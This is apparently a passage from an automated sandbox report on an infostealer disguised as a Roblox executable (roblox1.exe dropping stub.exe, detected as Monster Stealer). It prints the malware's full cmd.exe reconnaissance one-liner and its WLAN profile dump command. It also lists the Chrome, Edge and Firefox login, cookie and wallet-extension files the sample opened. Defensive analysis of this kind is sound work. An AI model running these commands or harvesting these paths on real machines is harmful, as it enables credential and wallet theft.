                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\net1.exeKey value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation Bias
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeCode function: 3_2_00007FFBAA7FBC74 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,3_2_00007FFBAA7FBC74
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Lowering of HIPS / PFW / Operating System Security Settings

                  barindex
                  Modifies the windows firewall
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
                  Uses netsh to modify the Windows network and firewall settings
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                  Source: stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: wireshark.exe
                  Source: stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ollydbg.exe
                  Source: C:\Windows\System32\net.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                  Source: C:\Windows\System32\net.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Monster Stealer
                  Source: Yara matchFile source: 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.1951447889.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: roblox1.exe PID: 1364, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: stub.exe PID: 3428, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe, type: DROPPED
                  Detected generic credential text file
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile created: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\Browsers\Cookies.txtJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile created: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\Browsers\Firefox\History.txtJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile created: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\system_info.txtJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile created: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\process_info.txtJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile created: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\network_info.txtJump to behavior
                  Found many strings related to Crypto-Wallets (likely being stolen)
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: aElectrum
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: aJaxx
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: aExodus
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: aEthereum
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: akeystore
                  Gathers network related connection and port information
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\NETSTAT.EXE netstat -ano
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\NETSTAT.EXE netstat -ano
                  Tries to harvest and steal WLAN passwords
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDBJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\extJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dirJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.filesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\gleanJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmiedaJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idbJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\to-be-removedJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCacheJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dirJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-shmJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e9edf720-d88f-46ea-8d95-7134a339b3c1Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest ResourcesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanentJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM StoreJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App SettingsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqliteJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasmJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons MonochromeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjfJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons MaskableJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnnegphlobjdpkhecapkijjdkgcjhkibJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons MaskableJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDBJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\IconsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\IconsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\crashes\eventsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\tmpJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\84b89d2b-fec7-4b59-87f2-603dcfbd43ddJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-releaseJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_storeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDBJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-walJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCacheJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\bookmarkbackupsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons MonochromeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\TempJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storageJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\defJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDBJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.filesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dirJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\IconsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\eventsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\IconsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension SettingsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfakJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\IconsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\saved-telemetry-pingsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\sessionstore-backupsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadataJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCacheJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\dbJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension StateJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NetworkJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code CacheJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons MonochromeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\StorageJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\1dcaa933-a69d-41cc-acb5-708980d119e5Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDBJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session StorageJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync DataJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjbJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons MonochromeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldbJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.filesJump to behavior
